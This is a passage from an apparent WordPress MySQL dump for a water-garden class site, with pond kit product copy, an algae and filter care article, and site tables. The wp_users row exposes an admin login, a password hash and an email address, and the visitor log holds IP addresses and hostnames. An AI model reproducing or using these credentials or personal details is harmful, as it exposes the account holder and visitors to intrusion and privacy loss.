garden. The American-Made skimmers and filters are extremely durable, and the underlayment is 25% thicker than the competition\'s. The pond liner is made by Firestone and comes with a 20 year warranty. Even the pumps are better!\n\nHere\'s what you\'ll get:\n\n• Biological 20.5\" Waterfall with Lifetime Warranty on body\n• Pond Skimmer-9\" Weir 4500 gph with Lifetime Warranty\n• 3100 GPH Waterfall Pump-3 year warranty\n• Firestone fish safe Pond Guard 45 mil EPDM liner-20 Year Warranty\n• Pond Underlayment\n• Filtration mats\n• Filter media bag\n• Skimmer basket\n• Water Treatment Kit\n• Easy to follow Instructions\n• Customer service tech support','American Pond Kits','','inherit','open','open','','93-revision','','','2013-06-16 14:58:00','2013-06-16 18:58:00','',93,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/93-revision/',0,'revision','',0),(97,1,'2013-06-23 13:36:05','2013-06-23 17:36:05','<img class=\"alignleft size-full wp-image-98\" alt=\"We have everything you need to build a water garden like this!\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/slider_1_image.jpg\" width=\"300\" height=\"246\" />Thanks for visiting! If you\'re planning to build or expand a backyard water garden, you\'re in the right place. We have free step-by-step instructions for creating everything from a small preformed pond to a large water garden oasis with fascinating wildlife and beautiful plantings.','Your Water Garden Information Center','','publish','open','open','','your-water-garden-information-center','','','2013-06-23 13:36:05','2013-06-23 17:36:05','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=97',0,'post','',0),(98,1,'2013-06-23 13:32:01','2013-06-23 17:32:01','','We have everything you need to build a water garden like this!','','inherit','open','open','','slider_1_image','','','2013-06-23 13:32:01','2013-06-23 17:32:01','',97,'http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/slider_1_image.jpg',0,'attachment','image/jpeg',0),(99,1,'2013-06-23 13:34:08','2013-06-23 17:34:08','<img class=\"alignleft size-full wp-image-98\" alt=\"We have everything you need to build a water garden like this!\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/slider_1_image.jpg\" width=\"300\" height=\"246\" />Thanks for visiting! If you\'re planning to build or expand a backyard water garden, you\'re in the right place. We have free step-by-step instructions for creating everything from a small preformed pond to a large water garden oasis with fascinating wildlife and beautiful plantings.','Your Water Garden Information Center','','inherit','open','open','','97-revision','','','2013-06-23 13:34:08','2013-06-23 17:34:08','',97,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/97-revision/',0,'revision','',0),(100,1,'2013-06-23 13:39:05','2013-06-23 17:39:05','Water Garden Kits Content\n\n<a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\"><img class=\"alignleft size-full wp-image-94\" alt=\"american-pond-free-freedom-kit\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\" width=\"216\" height=\"147\" /></a>\nThese American Pond kits are incredibly easy to install. You\'ll be able to create a beautiful water garden in no time at all!\n\nThe Freedom series by American Pond is perfect for a backyard water garden. The American-Made skimmers and filters are extremely durable, and the underlayment is 25% thicker than the competition\'s. The pond liner is made by Firestone and comes with a 20 year warranty. Even the pumps are better!\n\nHere\'s what you\'ll get:\n\n• Biological 20.5\" Waterfall with Lifetime Warranty on body\n• Pond Skimmer-9\" Weir 4500 gph with Lifetime Warranty\n• 3100 GPH Waterfall Pump-3 year warranty\n• Firestone fish safe Pond Guard 45 mil EPDM liner-20 Year Warranty\n• Pond Underlayment\n• Filtration mats\n• Filter media bag\n• Skimmer basket\n• Water Treatment Kit\n• Easy to follow Instructions\n• Customer service tech support','American Pond Kits','','inherit','open','open','','93-autosave','','','2013-06-23 13:39:05','2013-06-23 17:39:05','',93,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/93-autosave/',0,'revision','',0),(101,1,'2013-06-16 15:00:43','2013-06-16 19:00:43','Water Garden Kits Content\r\n\r\n<a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\"><img class=\"alignleft size-full wp-image-94\" alt=\"american-pond-free-freedom-kit\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/06/american-pond-free-freedom-kit.gif\" width=\"216\" height=\"147\" /></a>\r\nThese American Pond kits are incredibly easy to install. You\'ll be able to create a beautiful water garden in no time at all!\r\n\r\nThe Freedom series by American Pond is perfect for a backyard water garden. The American-Made skimmers and filters are extremely durable, and the underlayment is 25% thicker than the competition\'s. The pond liner is made by Firestone and comes with a 20 year warranty. Even the pumps are better!\r\n\r\nHere\'s what you\'ll get:\r\n\r\n• Biological 20.5\" Waterfall with Lifetime Warranty on body\r\n• Pond Skimmer-9\" Weir 4500 gph with Lifetime Warranty\r\n• 3100 GPH Waterfall Pump-3 year warranty\r\n• Firestone fish safe Pond Guard 45 mil EPDM liner-20 Year Warranty\r\n• Pond Underlayment\r\n• Filtration mats\r\n• Filter media bag\r\n• Skimmer basket\r\n• Water Treatment Kit\r\n• Easy to follow Instructions\r\n• Customer service tech support','American Pond Kits','','inherit','open','open','','93-revision-2','','','2013-06-16 15:00:43','2013-06-16 19:00:43','',93,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/93-revision-2/',0,'revision','',0),(102,1,'2013-06-26 13:16:16','2013-06-26 17:16:16','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\n\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\n\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\n<ul>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\n</ul>\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\n\n \n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-autosave','','','2013-06-26 13:16:16','2013-06-26 17:16:16','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-autosave/',0,'revision','',0),(103,1,'2013-06-09 15:06:05','2013-06-09 19:06:05','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ul>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ul>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision-4','','','2013-06-09 15:06:05','2013-06-09 19:06:05','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision-4/',0,'revision','',0),(104,1,'2013-06-23 13:41:38','2013-06-23 17:41:38','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ul>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ul>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision-5','','','2013-06-23 13:41:38','2013-06-23 17:41:38','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision-5/',0,'revision','',0),(105,1,'2013-06-26 13:16:57','2013-06-26 17:16:57','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ul>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ul>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision-6','','','2013-06-26 13:16:57','2013-06-26 17:16:57','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision-6/',0,'revision','',0); /*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_relationships` -- DROP TABLE IF EXISTS `wp_term_relationships`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL default '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL default '0', `term_order` int(11) NOT NULL default '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_relationships` -- LOCK TABLES `wp_term_relationships` WRITE; /*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */; INSERT INTO `wp_term_relationships` VALUES (107,4,0),(11,3,0),(11,2,0),(17,4,0),(18,4,0),(19,4,0),(22,4,0),(24,4,0),(26,4,0),(28,4,0),(51,4,0),(52,4,0),(53,4,0),(54,4,0),(55,4,0),(57,4,0),(56,4,0),(58,4,0),(61,4,0),(60,4,0),(59,4,0),(73,4,0),(85,4,0),(90,4,0),(92,4,0),(93,5,0),(93,6,0),(97,6,0),(11,6,0); /*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_taxonomy` -- DROP TABLE IF EXISTS `wp_term_taxonomy`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL auto_increment, `term_id` bigint(20) unsigned NOT NULL default '0', `taxonomy` varchar(32) NOT NULL default '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL default '0', `count` bigint(20) NOT NULL default '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_taxonomy` -- LOCK TABLES `wp_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */; INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'category','',0,1),(3,3,'category','',2,1),(4,4,'nav_menu','',0,23),(5,5,'category','',0,1),(6,6,'category','',0,3); /*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_terms` -- DROP TABLE IF EXISTS `wp_terms`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_terms` ( `term_id` bigint(20) unsigned NOT NULL auto_increment, `name` varchar(200) NOT NULL default '', `slug` varchar(200) NOT NULL default '', `term_group` bigint(10) NOT NULL default '0', PRIMARY KEY (`term_id`), UNIQUE KEY `slug` (`slug`), KEY `name` (`name`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_terms` -- LOCK TABLES `wp_terms` WRITE; /*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */; INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Maintenance','maintenance',0),(3,'Water','water',0),(4,'Main Horizontal','main-horizontal',0),(5,'Kits','kits',0),(6,'Slider','slider',0); /*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_usermeta` -- DROP TABLE IF EXISTS `wp_usermeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL auto_increment, `user_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=23 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_usermeta` -- LOCK TABLES `wp_usermeta` WRITE; /*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */; INSERT INTO `wp_usermeta` VALUES (1,1,'first_name',''),(2,1,'last_name',''),(3,1,'nickname','admin'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media'),(17,1,'wp_user-settings','hidetb=1&editor=tinymce&wplink=1&libraryContent=browse&align=left&urlbutton=none'),(14,1,'show_welcome_panel','1'),(15,1,'wp_dashboard_quick_press_last_post_id','108'),(16,1,'wp_user-settings-time','1372008961'),(18,1,'managenav-menuscolumnshidden','a:3:{i:0;s:11:\"css-classes\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(19,1,'metaboxhidden_nav-menus','a:0:{}'),(20,1,'closedpostboxes_nav-menus','a:0:{}'),(21,1,'meta-box-order_nav-menus','a:1:{s:4:\"side\";s:85:\"nav-menu-theme-locations,add-custom-links,add-page,add-post,add-category,add-post_tag\";}'),(22,1,'nav_menu_recently_edited','4'); /*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_users` -- DROP TABLE IF EXISTS `wp_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `user_login` varchar(60) NOT NULL default '', `user_pass` varchar(64) NOT NULL default '', `user_nicename` varchar(50) NOT NULL default '', `user_email` varchar(100) NOT NULL default '', `user_url` varchar(100) NOT NULL default '', `user_registered` datetime NOT NULL default '0000-00-00 00:00:00', `user_activation_key` varchar(60) NOT NULL default '', `user_status` int(11) NOT NULL default '0', `display_name` varchar(250) NOT NULL default '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_users` -- LOCK TABLES `wp_users` WRITE; /*!40000 ALTER TABLE `wp_users` DISABLE KEYS */; INSERT INTO `wp_users` VALUES (1,'Ed2goBill','$P$BhBDXx3CDgfi2bc6gHPYOMmbMUXvQR/','Ed2goBill','Gammon_Press@msn.com','','2013-05-22 18:21:41','',0,'Ed2goBill'); /*!40000 ALTER TABLE `wp_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup` -- DROP TABLE IF EXISTS `wp_wassup`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_wassup` ( `id` mediumint(9) unsigned NOT NULL auto_increment, `wassup_id` varchar(60) NOT NULL, `timestamp` varchar(20) NOT NULL, `ip` varchar(50) default NULL, `hostname` varchar(150) default NULL, `urlrequested` text, `agent` varchar(255) default NULL, `referrer` text, `search` varchar(255) default NULL, `searchpage` int(11) unsigned default '0', `os` varchar(15) default NULL, `browser` varchar(50) default NULL, `language` varchar(5) default NULL, `screen_res` varchar(15) default NULL, `searchengine` varchar(25) default NULL, `spider` varchar(50) default NULL, `feed` varchar(50) default NULL, `username` varchar(50) default NULL, `comment_author` varchar(50) default NULL, `spam` varchar(5) default '0', `url_wpid` varchar(50) default NULL, UNIQUE KEY `id` (`id`), KEY `idx_wassup` (`wassup_id`(32),`timestamp`), KEY `os` (`os`), KEY `browser` (`browser`), KEY `timestamp` (`timestamp`) ) ENGINE=MyISAM AUTO_INCREMENT=43 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_wassup` -- LOCK TABLES `wp_wassup` WRITE; /*!40000 ALTER TABLE `wp_wassup` DISABLE KEYS */; INSERT INTO `wp_wassup` VALUES (1,'00000000000000000000000000000001','1372252797','127.0.0.1','localhost','[404] Welcome to WassUP','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA) WassUp/ (http://www.wpwp.org)','http://www.wpwp.org','',0,'Win7 x64','IE 10','us','','','','','Ed2goBill','','0',NULL),(2,'de1173a371418cffe4e242dbebcbcce0','1372253318','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','','',0,'Win7 x64','IE 10','us','','','','','Ed2goBill','','0','0'),(3,'de1173a371418cffe4e242dbebcbcce0','1372253336','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','',0,'Win7 x64','IE 10','us','','','','','','','0','0'),(4,'1cac4280124c9cd7bdbd04b11a019f97','1372253599','205.178.145.70','205.178.145.70','/ed2goclass/wp-cron.php?doing_wp_cron=1372267964.7398331165313720703125','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(5,'de1173a371418cffe4e242dbebcbcce0','1372253935','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?action=logout&_wpnonce=d701be87e1','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; 